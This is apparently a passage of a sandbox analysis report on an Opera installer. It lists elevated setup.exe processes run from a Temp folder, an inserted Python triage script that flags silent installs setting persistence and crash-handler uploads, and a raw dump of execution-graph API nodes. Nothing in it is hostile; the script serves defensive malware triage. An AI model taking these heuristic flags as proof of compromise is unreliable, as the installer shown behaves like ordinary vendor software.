Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0 --server-tracking-blob=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
Imagebase:0xce0000
File size:5'740'952 bytes
MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:false

Target ID:30
                                                                                                                                            Start time:11:40:02
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:31
                                                                                                                                            Start time:11:40:03
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                                                                                                                                            Imagebase:0x420000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:32
                                                                                                                                            Start time:11:40:04
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:33
                                                                                                                                            Start time:11:40:05
                                                                                                                                            Start date:09/12/2024
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
                                                                                                                                            Imagebase:0xce0000
                                                                                                                                            File size:5'740'952 bytes
                                                                                                                                            MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false
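The process records above are plain "Key:Value" lines, one blank-line-separated block per Target ID, and the interesting signal is in the command lines: the same setup.exe is launched from a per-user Temp directory with elevated privileges, once with --silent, once as a crashpad-handler pointed at a remote upload URL, and once as an installer that also sets --run-at-startup=1 and --setdefaultbrowser=1. The Python below is an added example, not part of the Joe Sandbox report: it parses that record format and runs the triage checks an analyst would want over these entries. The sample records are constructed from Target ID 29, 30 and 32 above, shortened to the fields the rules read; the rule names and the PERSISTENCE_FLAGS set are this example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample: Target ID 29, 30 and 32 from the report above, cut down to
# the fields the rules below read. Real records carry more lines; extra keys are kept.
SAMPLE_REPORT = r"""
Target ID:29
Start time:11:40:02
Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --silent --allusers=0
MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges:true
Has administrator privileges:true
Has exited:false

Target ID:30
Start time:11:40:02
Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Commandline:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable
MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges:true
Has exited:false

Target ID:32
Start time:11:40:04
Path:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --setdefaultbrowser=1 --pintotaskbar=1 --run-at-startup=1 --silent --desktopshortcut=1
MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
Has elevated privileges:true
Has administrator privileges:true
Has exited:false
"""

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# --flag, --flag=value or --flag="value with spaces"
FLAG_RE = re.compile(r'--([\w-]+)(?:=("[^"]*"|\S+))?')
# Installer switches that change what runs at logon or which browser owns URLs
# (this example's own choice of switches, taken from the command lines above).
PERSISTENCE_FLAGS = ("run-at-startup", "setdefaultbrowser", "pintotaskbar")


def parse_records(text):
    """One dict per blank-line-separated process block, keyed by the report's field names."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            if ":" not in line:
                continue
            # Split on the first ':' only, so Path:C:\... and Start time:11:40:02 survive.
            key, value = line.split(":", 1)
            rec[key.strip()] = value.strip()
        if rec:
            records.append(rec)
    return records


def parse_flags(cmdline):
    """Map each --flag on the command line to its value (None for bare switches)."""
    return {name: value.strip('"') or None for name, value in FLAG_RE.findall(cmdline)}


def triage(records):
    """Apply the triage rules; returns {target_id: [finding, ...]} in record order."""
    findings = {}
    for rec in records:
        tid = rec.get("Target ID", "?")
        flags = parse_flags(rec.get("Commandline", ""))
        elevated = rec.get("Has elevated privileges", "").lower() == "true"
        hits = []
        # Rule 1: elevated process whose image lives in a per-user Temp directory.
        if elevated and TEMP_DIR_RE.search(rec.get("Path", "")):
            hits.append("elevated-from-temp")
        # Rule 2: unattended install that also sets logon persistence or the default browser.
        if "silent" in flags and any(flags.get(f) == "1" for f in PERSISTENCE_FLAGS):
            hits.append("silent-install-with-persistence")
        # Rule 3: crash-reporting helper pointed at a remote upload URL.
        if flags.get("type") == "crashpad-handler" and flags.get("url"):
            hits.append("crash-handler-upload:" + flags["url"])
        findings[tid] = hits
    return findings


def targets_by_hash(records):
    """Group Target IDs by MD5 so one binary launched in several roles stands out."""
    groups = defaultdict(list)
    for rec in records:
        groups[rec.get("MD5 hash", "").lower()].append(rec.get("Target ID", "?"))
    return dict(groups)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for tid, hits in triage(recs).items():
        print(f"Target {tid}: {', '.join(hits) or 'no findings'}")
    print(targets_by_hash(recs))
```

Run against the full report text, the same functions give one finding list per Target ID and a hash-to-targets map; the latter is what makes it obvious that F9DA76E8D7DB633AB031EE5AC59BB55E is a single dropped binary relaunched as installer, backend and crash handler rather than three different files.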


                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:32.3%
                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                              Signature Coverage:16.2%
                                                                                                                                              Total number of Nodes:1392
                                                                                                                                              Total number of Limit Nodes:52
execution_graph: [raw node/edge listing of the interactive Execution Graph widget omitted; it is not readable as text. Win32 APIs named in its nodes, grouped: registry (RegOpenKeyExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey); file system (GetFileAttributesW, SetFileAttributesW, CreateFileW, ReadFile, WriteFile, SetFilePointer, DeleteFileW, CopyFileW, CreateDirectoryW, SetCurrentDirectoryW, GetTempPathW, SearchPathW, GetFullPathNameW, GetShortPathNameW, WritePrivateProfileStringW); process and loader (CreateProcessW, WaitForSingleObject, GetExitCodeProcess, ShellExecuteExW, CreateThread, LoadLibraryExW, GetModuleHandleA, GetProcAddress, ExitProcess); privilege and shutdown (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx); window and clipboard (FindWindowExW, SendMessageTimeoutW, SetForegroundWindow, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard); COM and shell (OleInitialize, CoCreateInstance, CoUninitialize, SHGetPathFromIDListW, SHGetFileInfoW, CoTaskMemFree); environment (GetVersionExW, GetCommandLineW, ExpandEnvironmentStringsW, SetEnvironmentVariableW, GetTickCount, Sleep).]
4377->4365 4377->4366 4378->4375 4612 402b7e 4613 402bd0 4612->4613 4614 402b85 4612->4614 4615 406a96 5 API calls 4613->4615 4617 402da9 21 API calls 4614->4617 4618 402bce 4614->4618 4616 402bd7 4615->4616 4619 402dcb 21 API calls 4616->4619 4620 402b93 4617->4620 4621 402be0 4619->4621 4622 402da9 21 API calls 4620->4622 4621->4618 4623 402be4 IIDFromString 4621->4623 4625 402b9f 4622->4625 4623->4618 4624 402bf3 4623->4624 4624->4618 4630 4066a2 lstrcpynW 4624->4630 4629 4065e9 wsprintfW 4625->4629 4627 402c10 CoTaskMemFree 4627->4618 4629->4618 4630->4627 4631 401000 4632 401037 BeginPaint GetClientRect 4631->4632 4633 40100c DefWindowProcW 4631->4633 4635 4010f3 4632->4635 4636 401179 4633->4636 4637 401073 CreateBrushIndirect FillRect DeleteObject 4635->4637 4638 4010fc 4635->4638 4637->4635 4639 401102 CreateFontIndirectW 4638->4639 4640 401167 EndPaint 4638->4640 4639->4640 4641 401112 6 API calls 4639->4641 4640->4636 4641->4640 4642 402a80 4643 402da9 21 API calls 4642->4643 4644 402a86 4643->4644 4645 402ac9 4644->4645 4646 402aad 4644->4646 4649 402953 4644->4649 4647 402ae3 4645->4647 4648 402ad3 4645->4648 4651 402ab2 4646->4651 4655 402ac3 4646->4655 4650 4066df 21 API calls 4647->4650 4652 402da9 21 API calls 4648->4652 4650->4655 4656 4066a2 lstrcpynW 4651->4656 4652->4655 4655->4649 4657 4065e9 wsprintfW 4655->4657 4656->4649 4657->4649 3335 401781 3341 402dcb 3335->3341 3339 40178f 3340 4061c1 2 API calls 3339->3340 3340->3339 3342 402dd7 3341->3342 3343 4066df 21 API calls 3342->3343 3344 402df8 3343->3344 3345 401788 3344->3345 3346 406950 5 API calls 3344->3346 3347 4061c1 3345->3347 3346->3345 3348 4061ce GetTickCount GetTempFileNameW 3347->3348 3349 406208 3348->3349 3350 406204 3348->3350 3349->3339 3350->3348 3350->3349 3351 403c82 3352 403c93 CloseHandle 3351->3352 3353 403c9d 3351->3353 3352->3353 3354 403cb1 3353->3354 3355 403ca7 CloseHandle 3353->3355 3360 403cdf 3354->3360 3355->3354 3361 403ced 3360->3361 3362 403cb6 3361->3362 
3363 403cf2 FreeLibrary GlobalFree 3361->3363 3364 405dae 3362->3364 3363->3362 3363->3363 3400 406079 3364->3400 3367 405dd6 DeleteFileW 3369 403cc2 3367->3369 3368 405ded 3371 405f0d 3368->3371 3414 4066a2 lstrcpynW 3368->3414 3371->3369 3443 4069ff FindFirstFileW 3371->3443 3372 405e13 3373 405e26 3372->3373 3374 405e19 lstrcatW 3372->3374 3435 405fbd lstrlenW 3373->3435 3375 405e2c 3374->3375 3378 405e3c lstrcatW 3375->3378 3380 405e47 lstrlenW FindFirstFileW 3375->3380 3378->3380 3380->3371 3398 405e69 3380->3398 3383 405ef0 FindNextFileW 3386 405f06 FindClose 3383->3386 3383->3398 3384 405d66 5 API calls 3387 405f48 3384->3387 3386->3371 3388 405f62 3387->3388 3389 405f4c 3387->3389 3391 405727 28 API calls 3388->3391 3389->3369 3392 405727 28 API calls 3389->3392 3391->3369 3394 405f59 3392->3394 3393 405dae 64 API calls 3393->3398 3396 406462 40 API calls 3394->3396 3396->3369 3397 405727 28 API calls 3397->3398 3398->3383 3398->3393 3398->3397 3415 4066a2 lstrcpynW 3398->3415 3416 405d66 3398->3416 3424 405727 3398->3424 3439 406462 MoveFileExW 3398->3439 3449 4066a2 lstrcpynW 3400->3449 3402 40608a 3450 40601c CharNextW CharNextW 3402->3450 3405 405dce 3405->3367 3405->3368 3406 406950 5 API calls 3412 4060a0 3406->3412 3407 4060d1 lstrlenW 3408 4060dc 3407->3408 3407->3412 3409 405f71 3 API calls 3408->3409 3411 4060e1 GetFileAttributesW 3409->3411 3410 4069ff 2 API calls 3410->3412 3411->3405 3412->3405 3412->3407 3412->3410 3413 405fbd 2 API calls 3412->3413 3413->3407 3414->3372 3415->3398 3456 40616d GetFileAttributesW 3416->3456 3419 405d93 3419->3398 3420 405d81 RemoveDirectoryW 3422 405d8f 3420->3422 3421 405d89 DeleteFileW 3421->3422 3422->3419 3423 405d9f SetFileAttributesW 3422->3423 3423->3419 3425 405742 3424->3425 3434 4057e4 3424->3434 3426 40575e lstrlenW 3425->3426 3429 4066df 21 API calls 3425->3429 3427 405787 3426->3427 3428 40576c lstrlenW 3426->3428 3431 40579a 3427->3431 3432 40578d SetWindowTextW 3427->3432 3430 40577e lstrcatW 
3428->3430 3428->3434 3429->3426 3430->3427 3433 4057a0 SendMessageW SendMessageW SendMessageW 3431->3433 3431->3434 3432->3431 3433->3434 3434->3383 3436 405fcb 3435->3436 3437 405fd1 CharPrevW 3436->3437 3438 405fdd 3436->3438 3437->3436 3437->3438 3438->3375 3440 406483 3439->3440 3441 406476 3439->3441 3440->3398 3459 4062e8 3441->3459 3444 405f32 3443->3444 3445 406a15 FindClose 3443->3445 3444->3369 3446 405f71 lstrlenW CharPrevW 3444->3446 3445->3444 3447 405f3c 3446->3447 3448 405f8d lstrcatW 3446->3448 3447->3384 3448->3447 3449->3402 3451 406039 3450->3451 3452 40604b 3450->3452 3451->3452 3453 406046 CharNextW 3451->3453 3454 405f9e CharNextW 3452->3454 3455 40606f 3452->3455 3453->3455 3454->3452 3455->3405 3455->3406 3457 405d72 3456->3457 3458 40617f SetFileAttributesW 3456->3458 3457->3419 3457->3420 3457->3421 3458->3457 3460 406318 3459->3460 3461 40633e GetShortPathNameW 3459->3461 3486 406192 GetFileAttributesW CreateFileW 3460->3486 3462 406353 3461->3462 3463 40645d 3461->3463 3462->3463 3466 40635b wsprintfA 3462->3466 3463->3440 3465 406322 CloseHandle GetShortPathNameW 3465->3463 3467 406336 3465->3467 3468 4066df 21 API calls 3466->3468 3467->3461 3467->3463 3469 406383 3468->3469 3487 406192 GetFileAttributesW CreateFileW 3469->3487 3471 406390 3471->3463 3472 40639f GetFileSize GlobalAlloc 3471->3472 3473 4063c1 3472->3473 3474 406456 CloseHandle 3472->3474 3488 406215 ReadFile 3473->3488 3474->3463 3479 4063e0 lstrcpyA 3481 406402 3479->3481 3480 4063f4 3482 4060f7 4 API calls 3480->3482 3483 406439 SetFilePointer 3481->3483 3482->3481 3495 406244 WriteFile 3483->3495 3486->3465 3487->3471 3489 406233 3488->3489 3489->3474 3490 4060f7 lstrlenA 3489->3490 3491 406138 lstrlenA 3490->3491 3492 406140 3491->3492 3493 406111 lstrcmpiA 3491->3493 3492->3479 3492->3480 3493->3492 3494 40612f CharNextA 3493->3494 3494->3491 3496 406262 GlobalFree 3495->3496 3496->3474 4658 401d82 4659 402da9 21 API calls 4658->4659 4660 401d93 SetWindowLongW 
4659->4660 4661 402c4f 4660->4661 3516 402903 3517 40290b 3516->3517 3518 40290f FindNextFileW 3517->3518 3520 402921 3517->3520 3519 402968 3518->3519 3518->3520 3522 4066a2 lstrcpynW 3519->3522 3522->3520 3523 401f03 3524 402da9 21 API calls 3523->3524 3525 401f09 3524->3525 3526 402da9 21 API calls 3525->3526 3527 401f15 3526->3527 3528 401f21 ShowWindow 3527->3528 3529 401f2c EnableWindow 3527->3529 3530 402c4f 3528->3530 3529->3530 4662 401503 4663 401508 4662->4663 4664 40152e 4662->4664 4665 402da9 21 API calls 4663->4665 4665->4664 4666 401588 4667 402bc9 4666->4667 4670 4065e9 wsprintfW 4667->4670 4669 402bce 4670->4669 4678 40198d 4679 402da9 21 API calls 4678->4679 4680 401994 4679->4680 4681 402da9 21 API calls 4680->4681 4682 4019a1 4681->4682 4683 402dcb 21 API calls 4682->4683 4684 4019b8 lstrlenW 4683->4684 4685 4019c9 4684->4685 4686 401a0a 4685->4686 4690 4066a2 lstrcpynW 4685->4690 4688 4019fa 4688->4686 4689 4019ff lstrlenW 4688->4689 4689->4686 4690->4688 4691 40508e GetDlgItem GetDlgItem 4692 4050e0 7 API calls 4691->4692 4705 405305 4691->4705 4693 405187 DeleteObject 4692->4693 4694 40517a SendMessageW 4692->4694 4695 405190 4693->4695 4694->4693 4697 4051c7 4695->4697 4699 4066df 21 API calls 4695->4699 4696 4053e7 4698 405493 4696->4698 4708 405440 SendMessageW 4696->4708 4731 4052f8 4696->4731 4700 404621 22 API calls 4697->4700 4703 4054a5 4698->4703 4704 40549d SendMessageW 4698->4704 4706 4051a9 SendMessageW SendMessageW 4699->4706 4701 4051db 4700->4701 4707 404621 22 API calls 4701->4707 4702 405374 4702->4696 4709 4053d9 SendMessageW 4702->4709 4715 4054b7 ImageList_Destroy 4703->4715 4716 4054be 4703->4716 4727 4054ce 4703->4727 4704->4703 4705->4696 4705->4702 4745 404fdc SendMessageW 4705->4745 4706->4695 4722 4051ec 4707->4722 4713 405455 SendMessageW 4708->4713 4708->4731 4709->4696 4710 404688 8 API calls 4714 405694 4710->4714 4712 405648 4720 40565a ShowWindow GetDlgItem ShowWindow 4712->4720 4712->4731 4719 405468 
4713->4719 4715->4716 4717 4054c7 GlobalFree 4716->4717 4716->4727 4717->4727 4718 4052c7 GetWindowLongW SetWindowLongW 4721 4052e0 4718->4721 4728 405479 SendMessageW 4719->4728 4720->4731 4723 4052e5 ShowWindow 4721->4723 4724 4052fd 4721->4724 4722->4718 4726 40523f SendMessageW 4722->4726 4729 4052c2 4722->4729 4732 405291 SendMessageW 4722->4732 4733 40527d SendMessageW 4722->4733 4743 404656 SendMessageW 4723->4743 4744 404656 SendMessageW 4724->4744 4726->4722 4727->4712 4738 405509 4727->4738 4750 40505c 4727->4750 4728->4698 4729->4718 4729->4721 4731->4710 4732->4722 4733->4722 4735 405613 4736 40561e InvalidateRect 4735->4736 4739 40562a 4735->4739 4736->4739 4737 405537 SendMessageW 4742 40554d 4737->4742 4738->4737 4738->4742 4739->4712 4740 404f97 24 API calls 4739->4740 4740->4712 4741 4055c1 SendMessageW SendMessageW 4741->4742 4742->4735 4742->4741 4743->4731 4744->4705 4746 40503b SendMessageW 4745->4746 4747 404fff GetMessagePos ScreenToClient SendMessageW 4745->4747 4749 405033 4746->4749 4748 405038 4747->4748 4747->4749 4748->4746 4749->4702 4759 4066a2 lstrcpynW 4750->4759 4752 40506f 4760 4065e9 wsprintfW 4752->4760 4754 405079 4755 40140b 2 API calls 4754->4755 4756 405082 4755->4756 4761 4066a2 lstrcpynW 4756->4761 4758 405089 4758->4738 4759->4752 4760->4754 4761->4758 4762 40168f 4763 402dcb 21 API calls 4762->4763 4764 401695 4763->4764 4765 4069ff 2 API calls 4764->4765 4766 40169b 4765->4766 4767 402b10 4768 402da9 21 API calls 4767->4768 4769 402b16 4768->4769 4770 4066df 21 API calls 4769->4770 4771 402953 4769->4771 4770->4771 3591 402711 3592 402da9 21 API calls 3591->3592 3601 402720 3592->3601 3593 40285d 3594 40276a ReadFile 3594->3593 3594->3601 3595 402803 3595->3593 3595->3601 3605 406273 SetFilePointer 3595->3605 3596 406215 ReadFile 3596->3601 3597 4027aa MultiByteToWideChar 3597->3601 3598 40285f 3614 4065e9 wsprintfW 3598->3614 3601->3593 3601->3594 3601->3595 3601->3596 3601->3597 3601->3598 3602 4027d0 SetFilePointer 
MultiByteToWideChar 3601->3602 3603 402870 3601->3603 3602->3601 3603->3593 3604 402891 SetFilePointer 3603->3604 3604->3593 3606 40628f 3605->3606 3613 4062a7 3605->3613 3607 406215 ReadFile 3606->3607 3608 40629b 3607->3608 3609 4062b0 SetFilePointer 3608->3609 3610 4062d8 SetFilePointer 3608->3610 3608->3613 3609->3610 3611 4062bb 3609->3611 3610->3613 3612 406244 WriteFile 3611->3612 3612->3613 3613->3595 3614->3593 4772 404791 lstrlenW 4773 4047b0 4772->4773 4774 4047b2 WideCharToMultiByte 4772->4774 4773->4774 4775 401491 4776 405727 28 API calls 4775->4776 4777 401498 4776->4777 3615 404b12 3616 404b3e 3615->3616 3617 404b4f 3615->3617 3698 405ce6 GetDlgItemTextW 3616->3698 3619 404b5b GetDlgItem 3617->3619 3625 404bc7 3617->3625 3621 404b6f 3619->3621 3620 404b49 3623 406950 5 API calls 3620->3623 3624 404b83 SetWindowTextW 3621->3624 3629 40601c 4 API calls 3621->3629 3622 404c9e 3678 404e4d 3622->3678 3685 405ce6 GetDlgItemTextW 3622->3685 3623->3617 3681 404621 3624->3681 3625->3622 3630 4066df 21 API calls 3625->3630 3625->3678 3636 404b79 3629->3636 3632 404c2e SHBrowseForFolderW 3630->3632 3631 404cce 3633 406079 18 API calls 3631->3633 3632->3622 3637 404c46 CoTaskMemFree 3632->3637 3638 404cd4 3633->3638 3634 404b9f 3639 404621 22 API calls 3634->3639 3636->3624 3642 405f71 3 API calls 3636->3642 3640 405f71 3 API calls 3637->3640 3686 4066a2 lstrcpynW 3638->3686 3641 404bad 3639->3641 3643 404c53 3640->3643 3684 404656 SendMessageW 3641->3684 3642->3624 3646 404c8a SetDlgItemTextW 3643->3646 3651 4066df 21 API calls 3643->3651 3646->3622 3647 404ceb 3649 406a96 5 API calls 3647->3649 3648 404bb3 3650 406a96 5 API calls 3648->3650 3665 404cf2 3649->3665 3652 404bba 3650->3652 3653 404c72 lstrcmpiW 3651->3653 3655 404bc2 SHAutoComplete 3652->3655 3652->3678 3653->3646 3657 404c83 lstrcatW 3653->3657 3654 404d33 3699 4066a2 lstrcpynW 3654->3699 3655->3625 3657->3646 3658 404d01 GetDiskFreeSpaceExW 3658->3665 3668 404d8b 3658->3668 3659 404d3a 3660 
40601c 4 API calls 3659->3660 3661 404d40 3660->3661 3663 404d46 3661->3663 3664 404d49 GetDiskFreeSpaceW 3661->3664 3662 405fbd 2 API calls 3662->3665 3663->3664 3666 404d64 MulDiv 3664->3666 3664->3668 3665->3654 3665->3658 3665->3662 3666->3668 3667 404dfc 3670 404e1f 3667->3670 3700 40140b 3667->3700 3668->3667 3687 404f97 3668->3687 3703 404643 KiUserCallbackDispatcher 3670->3703 3673 404dfe SetDlgItemTextW 3673->3667 3674 404dee 3690 404ece 3674->3690 3676 404e3b 3676->3678 3679 404e48 3676->3679 3707 404688 3678->3707 3704 404a6b 3679->3704 3682 4066df 21 API calls 3681->3682 3683 40462c SetDlgItemTextW 3682->3683 3683->3634 3684->3648 3685->3631 3686->3647 3688 404ece 24 API calls 3687->3688 3689 404de9 3688->3689 3689->3673 3689->3674 3691 404ee7 3690->3691 3692 4066df 21 API calls 3691->3692 3693 404f4b 3692->3693 3694 4066df 21 API calls 3693->3694 3695 404f56 3694->3695 3696 4066df 21 API calls 3695->3696 3697 404f6c lstrlenW wsprintfW SetDlgItemTextW 3696->3697 3697->3667 3698->3620 3699->3659 3721 401389 3700->3721 3703->3676 3705 404a79 3704->3705 3706 404a7e SendMessageW 3704->3706 3705->3706 3706->3678 3708 40474b 3707->3708 3709 4046a0 GetWindowLongW 3707->3709 3709->3708 3710 4046b5 3709->3710 3710->3708 3711 4046e2 GetSysColor 3710->3711 3712 4046e5 3710->3712 3711->3712 3713 4046f5 SetBkMode 3712->3713 3714 4046eb SetTextColor 3712->3714 3715 404713 3713->3715 3716 40470d GetSysColor 3713->3716 3714->3713 3717 404724 3715->3717 3718 40471a SetBkColor 3715->3718 3716->3715 3717->3708 3719 404737 DeleteObject 3717->3719 3720 40473e CreateBrushIndirect 3717->3720 3718->3717 3719->3720 3720->3708 3723 401390 3721->3723 3722 4013fe 3722->3670 3723->3722 3724 4013cb MulDiv SendMessageW 3723->3724 3724->3723 3725 401794 3726 402dcb 21 API calls 3725->3726 3727 40179b 3726->3727 3728 4017c3 3727->3728 3729 4017bb 3727->3729 3780 4066a2 lstrcpynW 3728->3780 3779 4066a2 lstrcpynW 3729->3779 3732 4017c1 3736 406950 5 API calls 3732->3736 3733 4017ce 3734 
405f71 3 API calls 3733->3734 3735 4017d4 lstrcatW 3734->3735 3735->3732 3752 4017e0 3736->3752 3737 4069ff 2 API calls 3737->3752 3738 40616d 2 API calls 3738->3752 3740 4017f2 CompareFileTime 3740->3752 3741 4018b2 3742 405727 28 API calls 3741->3742 3743 4018bc 3742->3743 3764 403396 3743->3764 3744 405727 28 API calls 3747 40189e 3744->3747 3745 4066a2 lstrcpynW 3745->3752 3749 4018e3 SetFileTime 3751 4018f5 CloseHandle 3749->3751 3750 4066df 21 API calls 3750->3752 3751->3747 3753 401906 3751->3753 3752->3737 3752->3738 3752->3740 3752->3741 3752->3745 3752->3750 3758 405d02 MessageBoxIndirectW 3752->3758 3762 401889 3752->3762 3763 406192 GetFileAttributesW CreateFileW 3752->3763 3754 40190b 3753->3754 3755 40191e 3753->3755 3756 4066df 21 API calls 3754->3756 3757 4066df 21 API calls 3755->3757 3759 401913 lstrcatW 3756->3759 3760 401926 3757->3760 3758->3752 3759->3760 3761 405d02 MessageBoxIndirectW 3760->3761 3761->3747 3762->3744 3762->3747 3763->3752 3765 4033c1 3764->3765 3766 4033a5 SetFilePointer 3764->3766 3781 40349e GetTickCount 3765->3781 3766->3765 3769 4018cf 3769->3749 3769->3751 3770 406215 ReadFile 3771 4033e1 3770->3771 3771->3769 3772 40349e 46 API calls 3771->3772 3773 4033f8 3772->3773 3773->3769 3774 403464 ReadFile 3773->3774 3776 403407 3773->3776 3774->3769 3776->3769 3777 406215 ReadFile 3776->3777 3778 406244 WriteFile 3776->3778 3777->3776 3778->3776 3779->3732 3780->3733 3782 4035f6 3781->3782 3783 4034cc 3781->3783 3784 403053 36 API calls 3782->3784 3794 40361d SetFilePointer 3783->3794 3791 4033c8 3784->3791 3786 4034d7 SetFilePointer 3788 4034fc 3786->3788 3788->3791 3792 406244 WriteFile 3788->3792 3793 4035d7 SetFilePointer 3788->3793 3795 403607 3788->3795 3798 403053 3788->3798 3812 406c11 3788->3812 3791->3769 3791->3770 3792->3788 3793->3782 3794->3786 3796 406215 ReadFile 3795->3796 3797 40361a 3796->3797 3797->3788 3799 403064 3798->3799 3800 40307c 3798->3800 3801 40306d DestroyWindow 3799->3801 3811 403074 
3799->3811 3802 403084 3800->3802 3803 40308c GetTickCount 3800->3803 3801->3811 3804 406ad2 2 API calls 3802->3804 3805 40309a 3803->3805 3803->3811 3804->3811 3806 4030a2 3805->3806 3807 4030cf CreateDialogParamW ShowWindow 3805->3807 3806->3811 3819 403037 3806->3819 3807->3811 3809 4030b0 wsprintfW 3810 405727 28 API calls 3809->3810 3810->3811 3811->3788 3813 406c36 3812->3813 3814 406c3e 3812->3814 3813->3788 3814->3813 3815 406cc5 GlobalFree 3814->3815 3816 406cce GlobalAlloc 3814->3816 3817 406d45 GlobalAlloc 3814->3817 3818 406d3c GlobalFree 3814->3818 3815->3816 3816->3813 3816->3814 3817->3813 3817->3814 3818->3817 3820 403046 3819->3820 3821 403048 MulDiv 3819->3821 3820->3821 3821->3809 4778 401a97 4779 402da9 21 API calls 4778->4779 4780 401aa0 4779->4780 4781 402da9 21 API calls 4780->4781 4782 401a45 4781->4782 4783 401598 4784 4015b1 4783->4784 4785 4015a8 ShowWindow 4783->4785 4786 4015bf ShowWindow 4784->4786 4787 402c4f 4784->4787 4785->4784 4786->4787 4788 402419 4789 402dcb 21 API calls 4788->4789 4790 402428 4789->4790 4791 402dcb 21 API calls 4790->4791 4792 402431 4791->4792 4793 